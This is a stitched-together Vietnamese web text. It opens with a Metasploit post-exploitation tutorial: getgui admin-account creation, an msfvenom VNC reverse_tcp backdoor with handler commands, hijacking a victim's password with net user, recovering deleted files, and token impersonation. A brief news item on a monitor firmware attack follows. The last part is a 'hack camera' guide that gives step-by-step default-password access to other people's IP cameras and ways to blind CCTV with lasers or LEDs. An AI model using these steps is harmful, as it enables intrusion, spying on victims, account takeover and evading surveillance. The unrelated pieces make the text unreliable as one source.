Phần này mình sẽ trình bày thêm một số trò hay sau khi đã thâm nhập thành công: Điều khiển màn hình máy victim từ xa: Cách 1: Để remote desktop được, đòi hỏi bạn phải leo thang đặc quyền. Ở dấu nhắc meterpreter, bạn gõ lệnh run getgui -e để kích hoạt điều khiển từ xa. Nếu thành công thì tiếp tục run getgui -u [tên] -p [mật_khẩu] để tạo một tài khoản administrator kèm mật khẩu vào máy nạn nhân. Nếu thành công tiếp thì mở một cửa sổ terminal khác, chạy rdesktop -u [tên] -p [mật_khẩu] [ip_nạn_nhân], để kết nối tới máy nạn nhân và yêu cầu quyền điều khiển. Cách này có điểm bất lợi đó là victim phải đăng xuất ra khỏi tài khoản của họ thì attacker mới sử dụng tài khoản vừa tạo kia để đăng nhập và điều khiển được. Tức là ko thể 2 người cùng điều khiển cùng một lúc. Chuyện này thật buồn cười! Ngay khi bạn thực hiện lệnh rdesktop, trên màn hình phía nạn nhân sẽ hiện thông báo, rằng có chấp nhận đăng xuất ra để attacker đăng nhập vào hay ko, có 2 lựa chọn là “có” và “không”, vậy thì hiển nhiên nạn nhân chọn “không” rồi. :V Cách 2: Bạn còn nhớ lệnh run vnc mình đã nhắc đến ở phần 1 chứ. Giao thức VNC đúng ra cho phép capture và remote, mà chạy run vnc lại chỉ capture được màn hình, ko điều khiển được. Có gì đó ko đúng ở đây. Quả thực như vậy. Có một tuỳ chọn quan trọng đó là “ViewOnly”, nó quy định có cho phép điều khiển 2 chiều hay ko. Giá trị mặc định của option này là True, tức là chỉ xem. Chúng ta cần đổi giá trị đó thành False. Lệnh run vnc ko có hỗ trợ thay đổi tuỳ chọn cho backdoor, mà chúng ta phải tự tạo backdoor riêng cho kết nối giao thức VNC này, bằng payload sau:
use exploit/multi/handler
Trong trường hợp bạn đã kết nối vào máy nạn nhân từ phiên trước đó, tại dấu nhắc meterpreter> , bạn chỉ cần chạy lệnh upload [file] để tải file backdoor vừa tạo vào máy nạn nhân, rồi chạy execute -f [file] để thực thi nó. Sau đó background ra ngoài và thiết lập handler để lắng nghe như trên.
msfvenom -p windows/vncinject/reverse_tcp lhost=[ip] lport=[cổng] viewonly=false -f exe -o [tên_file.exe]
Mở msfconsole lên và chạy:
set payload windows/vncinject/reverse_tcp
set lhost [ip]
set lport [cổng]
set viewonly false
exploit
Đợi phía nạn nhân kích hoạt file mà bạn vừa tạo.
Trường hợp bạn muốn điều khiển từ xa ko phải trong mạng LAN nữa mà ra ngoài internet thì cũng khá rắc rối. Địa chỉ lhost và cổng lport bạn đặt giống như cách mình đã đề cập phần 1 đã. Nếu đợi quá lâu mà ko thấy gì thì nhiều khả năng đã bị tường lửa chặn, hoặc chưa được định tuyến đúng. Hơn nữa, bản thân giao thức VNC đã chậm rồi, truyền thông qua bên thứ 3 lại càng chậm hơn nữa, có khi hình ảnh truyền về bị delay đến cả phút.
Cách 3:
Về bản chất cách này giống hệt cách 1, tức là dùng giao thức RDP để điều khiển, chỉ có một điểm khác. Thay vì tạo một tài khoản phụ, ta đổi luôn mật khẩu của tài khoản mà nạn nhân đang đăng nhập. Do đó, khi ta chạy rdesktop để điều khiển, nạn nhân lập tức bị văng ra khỏi máy tính mà ko thể đăng nhập lại được. Cách này khá là thô bạo, ko khuyến khích thực hiện.
Đối với máy nạn nhân chạy hđh windows, tại dấu nhắc meterpreter> , chạy lệnh shell để chuyển sang chế độ thực thi lệnh powershell của windows. Tiếp theo gõ lệnh:
net user
để liệt kê ra các account trên máy tính nạn nhân.
Nhận diện tài khoản đang đăng nhập, bằng cách gõ lệnh whoami .
net user [tài_khoản] * để tiến hành đặt mật khẩu mới cho tài khoản đó.
Rồi trở lại đăng nhập rdesktop bằng user và pass vừa đổi.
Khôi phục file bị xoá trong máy nạn nhân:
Cái này hay nè, ko những lấy cắp dữ liệu hiện hữu từ nạn nhân mà còn lấy được dữ liệu đã bị xoá. Điều kiện cần cũng là phải leo thang đặc quyền.
Để sử dụng module này, ở dấu nhắc msf> , gõ lệnh use post/windows/gather/forensics/recovery_files . Sau đó gõ show options để xem các tuỳ chọn cần nhập.
set drive [ổ_đĩa] : : chọn ổ đĩa cần quét, mặc định là C:
set session [mã_phiên] : chọn chạy tool trên phiên làm việc nào.
set files [định_dạng] : lọc ra định dạng file nhất định, nếu để trống thì nó tìm tất. Xong rồi gõ run để chạy tool và chờ đợi. Xác suất thành công tỉ lệ nghịch với kích thước ổ đĩa, dung lượng file cần phục hồi, và sự ghi đè của dữ liệu mới.
File khôi phục được lưu vào thư mục “/root/.msf4/loot” .
Chạy dưới chế độ ẩn danh và bằng quyền user khác:
Điều kiện là phải đã leo thang đặc quyền. Chạy dưới chế độ ẩn danh, tại dấu nhắc meterpreter> :
use incognito
Lấy token user và hoán đổi sang quyền user đó:list_tokens -u
ví dụ kết quả có “hoang-PC\test”impersonate_token hoang-PC\\test [lưu ý phải có 2 dấu sổ ngược]
Kiểm tra lại quyền user bằng lệnh getuid .
Chúng ta đều biết hacker có thể tấn công máy tính bất cứ lúc nào nhưng việc hacker lợi dụng màn hình máy tính để xâm nhập màn hình hệ thống thì không phải ai cũng có thể ngờ tới. Ang Cui, một nhà khoa học, người sáng lập ra công ty Red Balloon Security chuyên bảo mật các thiết bị nhúng đã chia sẻ một video chỉ rõ cách anh xâm nhập vào máy tính người dùng thông qua màn hình chính, tạo ra lỗ hổng trên máy tính để lấy cắp thông tin cá nhân. Bằng cách này, hacker thậm chí có thể thay đổi số tiền trong tài khoản ngân hàng của người dùng.
- Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 1
- Kỹ thuật Hack cơ bản - Phần I
Đây là cách mà tin tặc hoạt động:
Xem thêm
Ang Cui cho biết, hầu hết người dùng không tin là họ có thể bị đánh lừa bởi chính màn hình máy tính của mình. Nhưng trên thực tế các hacker có thể tạo ra một web giả và thay đổi nội dung trên màn hình chỉ trong chớp nhoáng khiến người dùng dùng nhập thông tin cá nhân vào. Điều này khiến tin tặc có thể biết tất cả những gì mà người dùng máy tính đang quan sát.
Ang Cui đã thực hiện một thí nghiệm với trang web Paypal giả trên màn hình trên một máy tính Dell màn hình 24 inch [Dell U2410]. Trên thực tế có một màn hình phía sau nhận trách nhiệm hiển thị các điểm ảnh và thông tin đầu vào, nó được điều khiển bởi bộ "Monitor" hiển thị trên bề mặt. Khi tấn công, tin tặc có thể chuyển người dùng đến một trang web trông giống như trang web chuyển tiền hoặc trang chủ ngân hàng, sau đó ẩn khóa SSL lên trình duyệt này. Chúng có thể thay đổi thông tin đang hiển thị như tài khoản ngân hàng bằng cách sử dụng màn hình chính. Ví dụ như thay vì có 100 USD, người dùng có thể nhìn thấy trên màn hình hiện lên 1 triệu USD. Hacker chỉ tương tác thông qua máy tính này đến màn hình máy kia nên người dùng dễ dàng bị đánh lừa.
Theo tính toán của Ang Cui, trên thế giới có ít nhất một tỷ màn hình máy tính đều dễ bị tấn công kiểu này, nó gọi là "A Monitor Darkly".
Sau được thông báo về tính dễ tổn thương này, hãng máy tính Dell đã khuyên người dùng nên cập nhật màn hình lên phiên bản U2415.
Xem thêm:
- Kẻ tiếp tay cho hacker tấn công mạng công ty lại chính là nhân viên của công ty
- Cựu hacker NSA hô biến phần mềm diệt virus Kaspersky thành công cụ gián điệp
- Đây là cách tôi hack 40 website trong 7 phút
Hack Camera là khá niệm khá nóng hổi trên mạng xã hội thời gian gần đây. Tuy hệ thống Camera có khả năng bảo mật rất tốt, nhưng nếu gia đình bạn không biết cách bảo mật tốt, thì có thể bị Hacker truy cập đánh cắp thông tin hoặc phá hoại thiết bị bất cứ lúc nào. Bài viết dưới đây, sẽ liệt kê một số cách Hack Camera mà các tin tặc thường sử dùng, để từ đó bạn có thể tìm ra phương pháp khác phục lỗ hổng và bảo mật thông tin của mình được tốt hơn.
Lưu ý: Bài viết không khuyến khích mọi người tìm cách Hack Camera của người khác. Bài viết chỉ liệt kê một số lỗ hổng bảo mật mà mọi người thường chủ quan, từ đó đưa ra giải pháp bảo vệ thiết bị nhà mình được tốt hơn!
Xem thêm: 093 là mạng gì?
Hack Camera là gì?
Hack Camera là một hình thức truy cập trái phép vào hệ thống Camera giá sát một cách cố ý, nhằm mục đích đánh cắp thông tin hoặc nhiều mục đích xấu khác.
Nhu cầu sử dung, lắp đặt camera giám sát hiện nay ngày càng tăng cao, Camera giám sát được sử dụng ở nhiều nơi, phổ biến như trung tâm mua sắm, siêu thị, các tòa nhà cao tầng, văn phòng công ty, nhà kho xưởng,… các tạp hóa nhỏ hiện nay cũng đã trang bị hệ thống Camera.
Chính bởi điều này mà hiện nay có khá nhiều đơn vị đứng ra nhận lắp đặt camera giá sát. Tuy nhiên, không phải người thợ nào cũng có tay nghề cao, chuyên môn sâu trong bảo mật dữ liệu nên thường chỉ lắp đặt camera sơ sài rồi bàn giao.
Chính vì điều này mà Hacker có thể dễ dàng tấn công vào hệ thống Camera đánh cắp dữ liệu hoặc làm hỏng thiết bị của bạn.
Xem thêm: Laptop cũ giá rẻ tại Lê Ngĩa
Các phương thức tấn công Camera được Hacker sử dụng phổ biến:
Để Hack Camera, Hacker thường sử dụng 2 phương thức để tấn công hệ thống đó là:
Phương thức 1: Đây là kiểu tấn công trực tiếp vào thiết bị Camera bằng công cụ Scan IP và Port của Camera. Sau đó, Hacker sẽ tìm cách xâm nhập vào hệ thống để xem hình ảnh một cách trái phép. Đây là cách tấn công rất phổ biến, vì đa phần người dùng Camera hiện nay đều sẻ dụng Password mặc định từ nhà cung cấp.
Phương thức 2: phương thức này Hacker sẽ cài một phần mềm gián điệp trên Camera quan sát để tạo thành một mạng Botnet sử dụng trong một hình thức tấn công nổi tiếng đó là DDOS.
Trước kia, hình thức tấn công này thường chỉ áp dụng với hệ thống máy tính, nhưng hệ thống Camera an ninh cũng sử dụng chung một hệ điều hành nguồn mở dựa trên nền tảng Linux nên vô tình cũng chịu chung số phận.
Hướng dẫn cách Hack Camera giám sát, an ninh:
Hack Camera IP bằng dò tìm địa chỉ IP:
Mỗi đầu thu Camera hoặc Camera IP khi được kết nối với hệ thống mạng của gia đình bạn hay hệ thống mạng của cơ quan đều có một địa chỉ IP duy nhất, được dùng để truy cập vào.
Lợi dụng điểm nay, những người có ý đồ xấu muốn xem trộm Camera đã sử dụng phần mềm quét IP của thiết bị sau đó dùng mật khẩu mặc định của thiết bị để đăng nhập vào xem Camera.
Cách thực hiện như sau:
Bước 1: Tải phần mềm scan IP – Angry IP Scanner
Link tải: Tại đây
Bước 2: Theo điều hướng:
- Mở Angry IP Scanner >> Tools >> Preferences: tích vào Scan dead hosts, which don’t reply to pings.
Bước 3: Chuyển qua tab port và đánh vào các port mà camera quan sát thường sử dụng đó là: 80, 8080, 23.
Bước 4: Tiếp theo các bạn tìm địa chỉ IP hiện tại máy tính mình đang sử dụng bằng cách truy cập whatismyipaddress.com hoặc whoer.net.
Trở lại với phần mềm Angry IP Scanner các bạn nhập IP hiện tại vừa tìm được để quét các IP đang mở port 80, 8080, 23 gần nhất.
Sau khi có danh sách chúng ta có thể thấy ở cột Web detect ta chọn các địa chỉ IP có ký tự DVRDVS-Web. Ký tự này cho biết địa chỉ IP này là của một đầu ghi camera.
Truy cập vào địa chỉ IP này chúng ta có thể thấy giao diện xem camera qua mạng hiện ra, từ giao diện có thể thấy camera này thuộc về nhà cung cấp Hikvision từ Trung Quốc.
Search google bằng key Hikvision default username chúng ta sẽ tìm được list các username và password mặc định của đầu ghi camera hãng này.
Đánh user và mật khẩu [password] mặc định vào chúng ta có thể truy cập dễ dàng vào hệ thống để xem hình ảnh phát trực tiếp từ camera.
Cách Hack Camera bằng điện thoại, máy tính:
Ở cách làm này hacker khai thác ở đây là lỗi không đặt pass [mật khẩu] trong panel quản lý khi NAT IP ra ngoài để sử dụng sử dụng cổng port của Camera.
Cách thực hiện như sau:
Bước 1: Các bạn truy cập vào trang: //www.insecam.org/
Bước 2: Sau khi vào web, các bạn có thể điều chỉnh, lựa chọn địa chỉ, quốc gia và vị trí các bạn muốn xem giống như hình sau.
Bước 3: Sau khi đã chọn quốc gia và địa điểm bạn muốn xem sẽ xuất hiện các hình ảnh camera đang online bạn chỉ việc Click vào camera bạn muốn xem như hình sau:
Click vào hình ảnh camera quan sát đang hoạt động sẽ xuất hiện một đường có link địa chỉ là IP và hiện giao diện để điền user và pass để bạn truy cập vào trong đầu ghi hình camera. Lúc này bạn cần tìm tên đăng nhập và pass đăng nhập để truy cập vào đầu ghi hình camera để bạn xem trộm camera qua mạng một cách nhanh nhất.
Hack Camera Yoosee đơn giản nhất:
Các bước Hack Camera Yoosee thực hiện như sau:
Bước 1: Đầu tiên, bạn kết nối Wifi cung mạng với Camera.
Bước 2: Tiếp đến, bạn vào phần mềm FING và tìm kiếm tất cả địa chỉ IP của mạng đó, lúc này bạn sẽ tìm thấy địa chỉ IP của Camera Yoosee.
Bước 3: Scan Port tìm ra Port của Camera Yoosee. Thường Port là 80, nhưng bạn phải cần kiểm tra chính xác thì mới truy cập được.
Bước 4: Sau khi có IP và Port của Camera Yoosee cần xem. Bạn mở trình duyệt truy cập vào địa chỉ [IPcamera:port camera]
VD: IP Camera Yoosee là 192.168.1.199 Port là 88 thì bạn nhập địa chỉ: 192.168.1.199:88
Bước 5: Bạn tiến hành nhập Pass mặc định của Camera để truy cập vào. [Pass mặc định bạn có thể vào Google Seach tìm Mật khẩu mặc định của hãng Camera]
Chỉ với 5 bước làm đơn giản, bạn đã có thể xem trộm Camera Yoosee rồi.
Bật mí cách vô hiệu hóa Camera chi tiết:
1. Vô hiệu hóa Camera bằng Laser:
Vô hiệu hóa Camera bằng Laser thực hiện như sau:
Bạn hãy chiếu trực tiếp đèn Laser vào ống kính của Camera muốn vô hiệu hóa. Tuy phương pháp này khá tinh vi, nhưng đòi hỏi sự chuẩn xác phải thật cao. Nếu chấm Laser bị trượt khỏi ống kính dù chỉ 1s, camera sẽ bắt được hình ảnh của bạn. Vậy nên, cần phải hành động thật nhanh chóng và hiệu quả để tránh bị phát hiện.
Đặc biệt, phương pháp này có thể áp dụng cả ban ngày lẫn ban đêm
Lưu ý: Cách này, camera có thể bắt hình ảnh của bạn cho đến khi tia Laser được căn chỉnh đúng hướng. Máy quay lập tức có thể thu hình ảnh nếu có bất kỳ vật nào cản giữa tia Laser và ống kính. Ngoài ra, hiệu quả của phương pháp này cũng khá khó để đánh giá.
2. Chặn Camera bằng đèn LED:
Đèn LED có ánh sáng mạnh mẽ có thể dễ dàng vô hiệu hóa Camera giám sát mà không cần phải sử dụng thủ đoạn phức tạp nào cả.Tuy nhiên, phương pháp này chỉ hoạt động hiệu quả ở ban đêm. Đa số các camera hiện nay sẽ không ghi được bất kỳ hình ảnh nào và tất cả sẽ bị vô hiệu hóa bởi thủ thuật này.
Các bước thực hiện:
Bước 1: Đầu tiên, bạn tiến hành xác định vị trí Camera sau đó chiếu ánh sáng thẳng vào ống kính
Bước 2: Khi bạn làm chính xác, ánh sáng của đèn LED sẽ làm cho ống kính camera bị lóa và không thể ghi hình của bạn.
Cách này tuy không thể che khuất hết những hành động bạn đang làm, nhưng ít nhất nó cũng chue được khuôn mặt của bạn.
Xem thêm: 095 là mạng gì?